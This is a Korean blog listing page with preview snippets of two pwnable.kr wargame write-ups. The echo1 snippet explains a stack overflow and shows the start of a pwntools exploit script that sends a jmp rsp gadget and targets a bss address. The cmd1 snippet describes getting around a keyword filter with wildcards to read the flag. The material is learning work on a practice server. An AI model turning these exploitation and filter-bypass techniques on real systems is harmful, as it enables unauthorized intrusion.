pwnable.kr 썸네일형 리스트형 Pwnable.kr - echo1 25점 짜리이다. 취약점은 echo1 함수에서 일어나는데, s는 0x20만큼 할당되있지만 128byte만큼 받기때문에 overflow가 발생함! NX도 없어서 쉘코드를 넣어서 할려했는데 딱히 쉘코드를 넣을곳이 없다 ㅠㅠ 그래서 막 찾아보다가 id 라는게 bss영역에 저장되어있다 그러면 rip를 저 id영역으로 돌리고 쉘코드를 집어넣으면 된다! 12345678910111213141516171819202122232425from pwn import *r = remote("pwnable.kr", 9010)print r.recv(2048)jmp_rsp="\xff\xe4" r.sendline(jmp_rsp) print r.recvuntil(">") jmp_rsp="\xff\xe4"id_addr = 0x6020a0 .. 더보기 Pwnable.kr - cmd1 1점 짜리 문제이다. 보면 flag, sh, tmp를 필터링 하는데 와일드 카드를 이용해서 flag를 읽으면된다. 처음에 "" 안붙이고 하다가 왜 안되지? 이랬다. 더보기 이전 1 다음
